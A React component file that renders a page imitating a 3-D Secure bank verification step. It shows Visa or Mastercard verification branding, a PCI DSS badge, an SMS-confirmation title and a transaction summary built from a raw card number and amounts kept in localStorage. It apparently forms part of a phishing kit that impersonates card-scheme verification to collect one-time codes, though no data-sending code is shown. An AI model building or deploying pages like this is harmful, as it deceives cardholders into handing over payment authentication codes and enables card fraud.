import React, { useState } from 'react';
import { getCardScheme } from '../utils/cardScheme';
import { t, isRTL } from '../utils/i18n';
import { MERCHANT_NAME, CURRENCY } from '../utils/config';
import './StandardLayout.css';
import './themes/VisaTheme.css';
import './themes/MastercardTheme.css';

export const StandardLayout = ({
  title,
  subtitle,
  children,
  onCancel,
}) => {
  const [helpOpen, setHelpOpen] = useState(false);

  const rawNumber = localStorage.getItem('rawCardNumber') || localStorage.getItem('cardNumber') || '';
  const scheme = getCardScheme(rawNumber);
  const isVisa = scheme === 'visa';
  const themeClass = isVisa ? 'theme-visa' : 'theme-mastercard';

  const merchant =
    localStorage.getItem('merchant') || MERCHANT_NAME || 'Merchant';
  const currency =
    localStorage.getItem('currency') || CURRENCY || 'USD';
  const amount = localStorage.getItem('amount') || '0.00';
  const cardNumber = localStorage.getItem('cardNumber') || '**** **** **** ****';

  const today = new Date();
  const formattedDate = `${String(today.getDate()).padStart(2, '0')}/${String(
    today.getMonth() + 1
  ).padStart(2, '0')}/${today.getFullYear()}`;

  return (
    <div className={`threeds-page ${themeClass}`} dir={isRTL() ? 'rtl' : 'ltr'}>
      <div className="threeds-card">
        {/* Top scheme header */}
        <div className="threeds-header">
          <div className="threeds-scheme-logo">
            {isVisa ? (
              <img
                src="/images/visa.svg"
                alt="Verified by Visa"
                onError={(e) => {
                  e.target.onerror = null;
                  e.target.src = '/images/visa.jpg';
                }}
              />
            ) : (
              <img
                src="/images/mastercard.svg"
                alt="Mastercard Identity Check"
                onError={(e) => {
                  e.target.onerror = null;
                  e.target.src = '/images/master.jpg';
                }}
              />
            )}
          </div>
          <div className="threeds-security-badge">
            <img src="/images/pci.jpg" alt="PCI DSS" />
          </div>
        </div>

        {/* Title & Subtitle */}
        <div className="threeds-title-block">
          <h2>{title || t('confirmBySms')}</h2>
          {subtitle && <p>{subtitle}</p>}
        </div>

        {/* Transaction summary table */}
        <div className="threeds-details">
          <div className="threeds-detail-row">
            <span className="threeds-detail-label">{t('merchant')}:</span>
            <span className="threeds-detail-value">{merchant}</span>
          </div>
          <div className="threeds-detail-row">
            <span className="threeds-detail-label">{t('amount')}:</span>
            <span className="threeds-detail-value">
              {amount} {currency}
            </span>
          </div>
          <div className="threeds-detail-row">
            <span className="threeds-detail-label">{t('date')}:</span>
            <span className="threeds-detail-value">{formattedDate}</span>
          </div>
          <div className="threeds-detail-row">
            <span className="threeds-detail-label">{t('cardNumber')}:</span>
            <span className="threeds-detail-value">{cardNumber}</span>
          </div>
        </div>

        {/* Main form / interactive slot */}
        <div className="threeds-body">{children}</div>

        {/* Footer links */}
        <div className="threeds-footer">
          <button
            type="button"
            className="threeds-link-btn"
            onClick={() => setHelpOpen((prev) => !prev)}
          >
            {t('help')}
          </button>
          {onCancel && (
            <button type="button" className="threeds-link-btn cancel" onClick={onCancel}>
              {t('cancel')}
            </button>
          )}
        </div>

        {helpOpen && (
          <div className="threeds-help-drawer">
            <p>{t('helpText')}</p>
            <img src="/images/help.gif" alt="Help animation" className="threeds-help-gif" />
          </div>
        )}
      </div>
    </div>
  );
};

export default StandardLayout;
